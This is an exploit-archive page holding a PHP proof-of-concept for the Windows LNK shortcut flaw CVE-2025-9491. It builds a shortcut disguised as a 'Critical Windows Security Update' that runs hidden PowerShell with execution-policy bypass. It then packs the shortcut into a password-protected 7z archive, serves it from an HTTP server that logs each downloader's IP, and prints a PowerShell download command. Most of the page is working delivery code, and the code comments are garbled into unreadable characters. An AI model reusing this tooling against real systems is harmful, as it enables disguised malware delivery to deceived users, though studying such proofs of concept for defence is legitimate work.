Share
## https://sploitus.com/exploit?id=PACKETSTORM:217020
=============================================================================================================================================
| # Title : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System builtโin component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491
[+] Summary : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to:
Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, launches calc.exe).
Package the LNK file into a 7-Zip archive, optionally with a password.
Host the archive on a simple HTTP server using PHPโs built-in server.
Provide a PowerShell command that can download the archive from the HTTP server.
It is meant for educational and defensive testing, not exploitation. It does not contain a real vulnerability โ it simply shows the technique of using LNK + PowerShell delivery.
[+] Key technical points:
Uses Windows COM to create the LNK file.
Falls back to PowerShell if COM fails.
Optionally compresses with 7-Zip.
Starts HTTP server to serve the payload.
Designed to be run from the CLI on Windows.
POC : php poc.php
<?php
class WindowsLNKExploit {
private $scriptDir;
private $localIP;
public function __construct() {
$this->scriptDir = $this->getScriptDirectory();
$this->localIP = $this->getLocalIP();
}
private function getScriptDirectory() {
return dirname(__FILE__);
}
private function getLocalIP() {
$ip = gethostbyname(gethostname());
// ู
ุญุงููุฉ ุงูุญุตูู ุนูู IP ุญูููู
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_connect($sock, "8.8.8.8", 53);
socket_getsockname($sock, $ip);
socket_close($sock);
return $ip;
}
public function createMaliciousLNK() {
$lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
echo "[*] Creating malicious LNK file...\n";
try {
// ูู PHP ุนูู Windowsุ ูู
ูู ุงุณุชุฎุฏุงู
COM
$shell = new COM('WScript.Shell');
$shortcut = $shell->CreateShortcut($lnkPath);
$shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
$shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"';
$shortcut->WorkingDirectory = 'C:\\Windows\\System32';
$shortcut->Description = 'Critical Windows Security Update - KB5029244';
// ู
ุญุงููุฉ ุชุนููู ุฃููููุฉ
$iconPaths = [
'C:\\Windows\\System32\\shell32.dll',
'C:\\Windows\\System32\\imageres.dll',
];
foreach ($iconPaths as $iconPath) {
if (file_exists($iconPath)) {
$shortcut->IconLocation = $iconPath . ',78';
break;
}
}
$shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE
$shortcut->Save();
if (file_exists($lnkPath)) {
echo "[+] LNK created: $lnkPath\n";
return $lnkPath;
} else {
return null;
}
} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
// ุทุฑููุฉ ุจุฏููุฉ ุจุงุณุชุฎุฏุงู
PowerShell
return $this->createLNKWithPowerShell();
}
}
private function createLNKWithPowerShell() {
$lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
$psScript = "
\$WshShell = New-Object -ComObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('$lnkPath')
\$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
\$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"'
\$Shortcut.WorkingDirectory = 'C:\\Windows\\System32'
\$Shortcut.Description = 'Critical Windows Security Update - KB5029244'
\$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78'
\$Shortcut.WindowStyle = 7
\$Shortcut.Save()
";
$psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript));
$command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript";
exec($command, $output, $returnCode);
if (file_exists($lnkPath)) {
echo "[+] LNK created via PowerShell: $lnkPath\n";
return $lnkPath;
}
return null;
}
public function compressWith7Zip($lnkPath, $password = null) {
if (!$lnkPath || !file_exists($lnkPath)) {
echo "[-] LNK file not found\n";
return null;
}
// ุงูุจุญุซ ุนู 7-Zip
$sevenZipPaths = [
'C:\\Program Files\\7-Zip\\7z.exe',
'C:\\Program Files (x86)\\7-Zip\\7z.exe',
'7z.exe',
];
$sevenZip = null;
foreach ($sevenZipPaths as $path) {
if (file_exists($path)) {
$sevenZip = $path;
break;
}
}
if (!$sevenZip) {
// ุงูุจุญุซ ูู PATH
exec('where 7z', $output, $returnCode);
if ($returnCode === 0) {
$sevenZip = '7z';
} else {
echo "[-] 7-Zip not found\n";
return null;
}
}
$archiveName = $this->scriptDir . '\\update.7z';
// ุจูุงุก ุงูุฃู
ุฑ
$cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath);
if ($password) {
$cmd .= " -p" . escapeshellarg($password);
}
$cmd .= " -mx9 -mhe=on -t7z";
echo "[*] Compressing with 7-Zip...\n";
exec($cmd, $output, $returnCode);
if ($returnCode === 0 && file_exists($archiveName)) {
echo "[+] Archive created: $archiveName\n";
if ($password) {
echo "[+] Password: $password\n";
}
return $archiveName;
} else {
echo "[-] Compression failed\n";
return null;
}
}
public function startHTTPServer($port = 8080) {
echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n";
echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n";
echo "[+] Server running... Press Ctrl+C to stop\n";
$publicDir = $this->scriptDir;
// ุฅูุดุงุก ู
ูู router ุจุณูุท
$routerScript = $publicDir . '\\router.php';
$routerContent = '<?php
$request = $_SERVER["REQUEST_URI"];
if ($request === "/" || $request === "/update.7z") {
$file = __DIR__ . "\\update.7z";
if (file_exists($file)) {
header("Content-Type: application/x-7z-compressed");
header("Content-Disposition: attachment; filename=\\"update.7z\\"");
header("Content-Length: " . filesize($file));
readfile($file);
echo "[+] CVE-2025-9491: Malicious LNK served to " . $_SERVER["REMOTE_ADDR"] . "\\n";
exit;
}
}
http_response_code(404);
echo "404 Not Found";
?>';
file_put_contents($routerScript, $routerContent);
// ุชุดุบูู ุงูุฎุงุฏู
$command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript);
echo "Command: $command\n";
echo "You need to run this command manually in another terminal:\n";
echo $command . "\n\n";
// ุจุฏูุงู ู
ู ุฐููุ ูู
ูู ุงุณุชุฎุฏุงู
exec() ู
ุน nohup ุนูู Unix-like systems
// ุนูู Windowsุ ูู
ูู ุงุณุชุฎุฏุงู
start
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmdFile = $publicDir . '\\start_server.bat';
$batchContent = "@echo off\nstart /B $command\n";
file_put_contents($cmdFile, $batchContent);
echo "[+] Created batch file: $cmdFile\n";
echo "[+] Run it in a new terminal window\n";
}
}
public function main() {
echo str_repeat("=", 60) . "\n";
echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n";
echo str_repeat("=", 60) . "\n";
// ุงูุชุญูู ู
ู ูุธุงู
ุงูุชุดุบูู
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
echo "[-] This script requires Windows OS\n";
return;
}
// ุฅูุดุงุก ู
ูู LNK
$lnkFile = $this->createMaliciousLNK();
if (!$lnkFile) {
echo "[-] Failed to create LNK\n";
return;
}
// ุถุบุท ู
ุน 7-Zip
echo "\n[*] Compress with 7-Zip? (y/n): ";
$compress = trim(strtolower(fgets(STDIN)));
if ($compress === 'y') {
echo "[*] Password (optional): ";
$password = trim(fgets(STDIN));
if (empty($password)) {
$password = null;
}
$archive = $this->compressWith7Zip($lnkFile, $password);
if ($archive) {
echo "\n[+] Archive ready: $archive\n";
// ุจุฏุก ุฎุงุฏู
HTTP
echo "\n[*] Start HTTP server? (y/n): ";
$startServer = trim(strtolower(fgets(STDIN)));
if ($startServer === 'y') {
$this->startHTTPServer();
}
echo "\n[+] PowerShell download command:\n";
echo " iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n";
// ุงูุงูุชุธุงุฑ ููุฅุฏุฎุงู
echo "\n[*] Press Enter to exit...";
fgets(STDIN);
} else {
echo "[-] Compression failed\n";
echo "[*] Use raw LNK: $lnkFile\n";
}
} else {
echo "\n[*] Raw LNK file: $lnkFile\n";
}
}
public function generatePowerShellDownloadCommand() {
return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z";
}
}
// ุงูุชูุธูู ุงูุชููุงุฆู
register_shutdown_function(function() {
// ูู
ูู ุฅุถุงูุฉ ุชูุธูู ุงูู
ููุงุช ุงูู
ุคูุชุฉ ููุง
});
// ุงูุชูููุฐ
if (PHP_SAPI === 'cli') {
$exploit = new WindowsLNKExploit();
$exploit->main();
} else {
echo "This script must be run from command line (CLI)\n";
echo "Usage: php " . basename(__FILE__) . "\n";
}
// ูุธุงุฆู ู
ุณุงุนุฏุฉ ุฅุถุงููุฉ
class HelperFunctions {
public static function checkRequirements() {
$checks = [
'PHP Version' => version_compare(PHP_VERSION, '7.0.0', '>='),
'Windows OS' => (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'),
'COM Support' => extension_loaded('com_dotnet'),
'Exec Function' => function_exists('exec'),
];
return $checks;
}
public static function showBanner() {
$banner = "
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-9491 PoC โ
โ Author: indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
";
echo $banner . "\n";
}
}
// ุจุฏูู ูุงุณุชุฎุฏุงู
threading ูู PHP
class BackgroundProcess {
public static function runInBackground($command) {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
pclose(popen("start /B " . $command, "r"));
} else {
exec($command . " > /dev/null 2>&1 &");
}
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================